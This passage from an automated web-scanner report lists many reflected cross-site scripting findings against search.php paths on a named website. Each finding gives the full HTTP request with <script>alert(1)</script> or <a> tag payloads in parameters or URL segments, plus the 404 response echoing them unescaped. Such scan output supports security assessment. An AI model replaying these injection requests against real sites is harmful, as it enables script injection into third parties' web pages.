The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 711b7<a>2d1488de0f2 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /travel-vaccation/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search711b7<a>2d1488de0f2&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search711b7<a>2d1488de0f2&opt=2 was not found on this server.</p>
...[SNIP]...

2.4882. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/review/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /travel-vaccation/themes/kosmos/images/review/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 6bec6<a>379154bf08b was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /travel-vaccation/themes/kosmos/images/review/search.php?keyword=search...6bec6<a>379154bf08b&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/kosmos/images/review/search.php?keyword=search...6bec6<a>379154bf08b&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4883. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/review/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /travel-vaccation/themes/kosmos/images/review/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 2e5b8<script>alert(1)</script>a92f3a7ec4a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2&2e5b8<script>alert(1)</script>a92f3a7ec4a=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2&2e5b8<script>alert(1)</script>a92f3a7ec4a=1 was not found on this server.</p>
...[SNIP]...

2.4884. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/review/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /travel-vaccation/themes/kosmos/images/review/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 4b0a6<a>93fd573072d was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /travel-vaccation/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=24b0a6<a>93fd573072d HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=24b0a6<a>93fd573072d was not found on this server.</p>
...[SNIP]...

2.4885. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /travel-vaccation/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload be897<script>alert(1)</script>c7c453e5b22 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccationbe897<script>alert(1)</script>c7c453e5b22/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccationbe897<script>alert(1)</script>c7c453e5b22/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4886. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /travel-vaccation/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 40d51<script>alert(1)</script>6a58352d299 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themes40d51<script>alert(1)</script>6a58352d299/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes40d51<script>alert(1)</script>6a58352d299/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4887. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /travel-vaccation/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 3d435<script>alert(1)</script>ae44241649f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themes/kosmos3d435<script>alert(1)</script>ae44241649f/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/kosmos3d435<script>alert(1)</script>ae44241649f/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4888. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /travel-vaccation/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 67053<script>alert(1)</script>4e7ba3af3a4 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themes/kosmos/images67053<script>alert(1)</script>4e7ba3af3a4/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/kosmos/images67053<script>alert(1)</script>4e7ba3af3a4/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4889. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /travel-vaccation/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 4ebfc<script>alert(1)</script>c6f7861cee was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themes/kosmos/images/search.php4ebfc<script>alert(1)</script>c6f7861cee?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/kosmos/images/search.php4ebfc<script>alert(1)</script>c6f7861cee?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4890. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /travel-vaccation/themes/kosmos/images/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 888e4<a>6fb2decb651 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /travel-vaccation/themes/kosmos/images/search.php?keyword=search...&Submit3=Search888e4<a>6fb2decb651&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/kosmos/images/search.php?keyword=search...&Submit3=Search888e4<a>6fb2decb651&opt=2 was not found on this server.</p>
...[SNIP]...

2.4891. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /travel-vaccation/themes/kosmos/images/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 2cde7<a>91d135f54b3 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /travel-vaccation/themes/kosmos/images/search.php?keyword=search...2cde7<a>91d135f54b3&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/kosmos/images/search.php?keyword=search...2cde7<a>91d135f54b3&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4892. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /travel-vaccation/themes/kosmos/images/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 2d84c<script>alert(1)</script>3b08bab6e2c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&2d84c<script>alert(1)</script>3b08bab6e2c=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&2d84c<script>alert(1)</script>3b08bab6e2c=1 was not found on this server.</p>
...[SNIP]...

2.4893. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /travel-vaccation/themes/kosmos/images/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 6ae8c<a>4e5b118e111 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /travel-vaccation/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=26ae8c<a>4e5b118e111 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=26ae8c<a>4e5b118e111 was not found on this server.</p>
...[SNIP]...

2.4894. http://www.resellerbase.com/travel-vaccation/themes/kosmos/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /travel-vaccation/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2665f<script>alert(1)</script>9767cf72d84 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation2665f<script>alert(1)</script>9767cf72d84/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation2665f<script>alert(1)</script>9767cf72d84/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4895. http://www.resellerbase.com/travel-vaccation/themes/kosmos/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /travel-vaccation/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 414b0<script>alert(1)</script>c9d2b7cfb5f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themes414b0<script>alert(1)</script>c9d2b7cfb5f/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes414b0<script>alert(1)</script>c9d2b7cfb5f/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4896. http://www.resellerbase.com/travel-vaccation/themes/kosmos/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /travel-vaccation/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 69bff<script>alert(1)</script>f3efec7d1b9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themes/kosmos69bff<script>alert(1)</script>f3efec7d1b9/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/kosmos69bff<script>alert(1)</script>f3efec7d1b9/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4897. http://www.resellerbase.com/travel-vaccation/themes/kosmos/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /travel-vaccation/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload fc1ce<script>alert(1)</script>f78da651956 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themes/kosmos/search.phpfc1ce<script>alert(1)</script>f78da651956?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/kosmos/search.phpfc1ce<script>alert(1)</script>f78da651956?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4898. http://www.resellerbase.com/travel-vaccation/themes/kosmos/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /travel-vaccation/themes/kosmos/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload cc25f<a>201ab26538d was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /travel-vaccation/themes/kosmos/search.php?keyword=search...&Submit3=Searchcc25f<a>201ab26538d&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
